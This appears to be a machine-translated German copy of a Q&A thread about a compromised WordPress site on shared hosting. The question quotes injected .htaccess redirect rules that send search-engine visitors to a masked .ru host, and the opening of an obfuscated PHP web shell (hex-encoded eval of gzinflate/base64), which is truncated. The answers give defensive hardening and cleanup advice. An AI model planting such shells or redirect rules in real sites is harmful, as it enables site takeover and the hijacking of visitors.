webentwicklung-frage-antwort-db.com.de

Bereinigen Sie eine angegriffene Website

Seit wenigen Monaten wird eine Client-Website von Bots angegriffen. Ich habe den Quellcode der Website geändert (jetzt wordpress letzte Version), versuche zu säubern, aber finde ein Loch in der Sicherheit ...

Nach Bot-Aktion kann ich .htaccess-Dateien auf der Website finden, die folgendes enthalten:

ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|Twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]

Ich kann in meinen Protokolldateien die für das Hinzufügen von .htaccess verwendete Datei finden:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"

Mit diesem Code im Inneren:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]

Ich lösche .php-Dateien, .htaccess-Dateien, aber sie erscheinen nach Stunden oder Minuten ... Wie gehe ich vor, um die Lücke zu finden/den Bot-Angriff zu stoppen?

(Es ist auf Shared Hosting (ovh.com)

7
bux

Grundlegende Sicherheitsschritte

Da Wordpress so beliebt ist, gibt es viele Drive-by-Hacks , die sich die Vorteile von Sicherheitslücken zunutze machen. Alle Wordpress Benutzer sollten die folgenden grundlegenden und einfachen Schritte ausführen, um sich selbst zu schützen:

  • Verwenden Sie wp_ nicht als Präfix für die Datenbanktabelle, sondern eine beliebige Zeichenfolge, die anspricht.
  • Deaktivieren Sie Wordpress DB-Fehler.
  • Stellen Sie sicher, dass Ihr Verzeichnis auf chmod 755 und die Dateien 644 eingestellt ist.
  • Verwenden Sie einen sicherer Passwortgenerator (verwenden Sie mindestens 15 Zeichen).
  • Verwenden Sie admin nicht als Benutzernamen.
  • Platzieren Sie eine leere .htaccess-Datei im Verzeichnis wp-admin.
  • Lesen Sie Wordpress Härten
  • Überprüfen Sie den Google Cache Ihrer Website auf versteckte Malware.
  • Entfernen Sie <meta name="generator" content="WordPress X.X.X" /> aus dem Header Ihrer Site, indem Sie remove_action('wp_head', 'wp_generator'); in Ihre functions.php-Datei einfügen.

TimThumb Hack

Es gibt auch ein ein sehr beliebtes Hack-Laufwerk, das mit einer alten Version des beliebten Tim-Thumb-Skripts verknüpft ist , das Webmastern viele Probleme bereitet. Überprüfen Sie Ihr Upload-Verzeichnis auf PHP-Dateien und stellen Sie sicher, dass Sie auf die neueste Version des Skripts aktualisiert haben, um dies zu vermeiden.

Beratung

Ich verwende ungefähr 10 verschiedene WordPress-Programme und habe das WP-Security-Plugin und den Account von Website-Verteidiger für von unschätzbarem Wert befunden. Es überprüft Ihre Website regelmäßig und meldet Sicherheitsfehler, Malware und sogar Seitenfehler per E-Mail, damit Sie dies tun können Seien Sie versichert, dass Sie wissen, wenn etwas schief geht.

WP-Firewall ist auch sehr nützlich zur Abwehr von 0-Tage-Exploits und VirusTotal ist nützlich, wenn Sie eine Infektion vermuten.

Akismet und Disqus.com sind nützliche Tools zur Abwehr von Kommentar-Spam. Lesen Sie hierzu das Wiki für Webmaster-Profis .

Webmaster-Tools

Sie sollten sich auch bei den Webmaster-Tools anmelden . Wenn Sie jedoch den Verdacht auf eine Infektion haben, ergreifen Sie alle erforderlichen Maßnahmen, um diese zu finden und zu beseitigen Google warnt Ihre Nutzer, dass es sich bei Ihrer Website um eine gemeldete Angriffsseite handelt.

Wenn eine Infektion festgestellt wird, sendet Google eine E-Mail an alle folgenden Adressen: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected]. Stellen Sie daher sicher, dass mindestens eine dieser Adressen vorhanden ist und überwacht wird.

Bezahlte Umzugsdienste/Wo bekomme ich Hilfe?

Es gibt auch eine Reihe von Websites, die kostenpflichtige Malware-Entfernungsdienste anbieten. Ich wäre sehr misstrauisch . Viele davon scheinen Betrügereien der einen oder anderen Art zu sein .

In den WordPress-Foren , hier auf der Seite der Webmaster-Profis, steht kostenlos qualitativ hochwertige Hilfe und Unterstützung zur Verfügung . wordpress stackexchange site und am stackoverflow . Zahlen Sie nicht für Dinge, die Sie selbst reparieren können.

9
toomanyairmiles

Sie müssen jede Datei vollständig von Ihrer Website entfernen und eine Neuinstallation von Wordpress durchführen. Die Wahrscheinlichkeit besteht darin, dass sie Dateien hochgeladen haben, die ihnen einen kontinuierlichen Zugriff auf Ihre Website ermöglichen. Es sei denn, Sie möchten Datei für Datei herausfinden, welche (n) es sich um eine vollständige Neuinstallation handelt. Dies ist das Beste, was Sie tun können.

8
John Conde